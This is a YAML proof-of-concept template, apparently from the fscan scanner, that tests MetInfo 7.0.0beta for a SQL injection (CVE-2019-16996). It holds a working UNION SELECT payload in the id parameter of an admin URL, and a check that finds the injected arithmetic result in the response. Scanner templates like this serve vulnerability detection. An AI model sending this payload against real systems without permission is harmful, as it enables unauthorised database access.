fscan/Web_Scan/pocs/metinfo-cve-2019-16996-sqli...

16 lines
551 B
YAML

name: poc-yaml-metinfo-cve-2019-16996-sqli
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: >-
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
metinfo_version: 7.0.0beta
links:
- https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1